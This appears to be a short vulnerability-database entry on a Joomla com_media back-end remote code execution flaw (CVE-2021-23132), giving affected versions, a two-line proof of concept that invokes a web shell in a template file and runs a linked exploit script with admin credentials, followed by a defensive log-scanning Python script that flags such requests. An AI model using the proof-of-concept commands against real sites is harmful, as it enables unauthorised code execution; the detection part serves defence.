506 B / 2021-05-21 09:14:38
# Joomla com_media Back-End RCE (CVE-2021-23132)
Affected versions:
Joomla core <=3.9.24
* CVE-2021-23132: com_media allowed paths that are not intended for image uploads, leading to RCE.
* CVE-2020-24597: Directory traversal in com_media, leading to RCE.
Steps:
Obtain super administrator privileges, then trigger the RCE.
**PoC:**
```
http://target/templates/protostar/error.php?cmd=ls
python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234 -rce 1 -cmd ls
```
poc.py: https://github.com/HoangKien1020/CVE-2021-23132
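
A defender-side check for the request shown in the PoC, as an added example that is not part of the original page or the linked repository: it scans web server access logs for direct requests to a PHP file inside a template directory that carry query parameters. It assumes combined-format access logs and that such requests are not normal traffic on the site; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Common/combined log format: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# A PHP file directly under a template directory, e.g. /templates/protostar/error.php
TEMPLATE_PHP_RE = re.compile(r'^/templates/[^/]+/[^/]+\.php$', re.IGNORECASE)


def find_template_php_hits(log_lines):
    """Return requests that call a template PHP file directly with a query string."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        url = urlsplit(m.group("target"))
        path = unquote(url.path)  # decode %xx so an encoded file name still matches
        if not TEMPLATE_PHP_RE.match(path):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if not params:
            continue  # no parameters passed to the template file
        hits.append({
            "host": m.group("host"),
            "time": m.group("time"),
            "path": path,
            "params": sorted(params),
            "status": int(m.group("status")),
        })
    return hits


# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/May/2021:09:10:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [21/May/2021:09:10:02 +0000] "GET /templates/protostar/css/template.css HTTP/1.1" 200 830 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [21/May/2021:09:12:44 +0000] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "python-requests/2.25.1"',
    '198.51.100.7 - - [21/May/2021:09:13:05 +0000] "GET /templates/protostar/error.php?cmd=ls HTTP/1.1" 200 212 "-" "python-requests/2.25.1"',
]

if __name__ == "__main__":
    for hit in find_template_php_hits(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 is the case to investigate first; comparing the flagged template file against a clean copy of the same Joomla release shows whether it was modified.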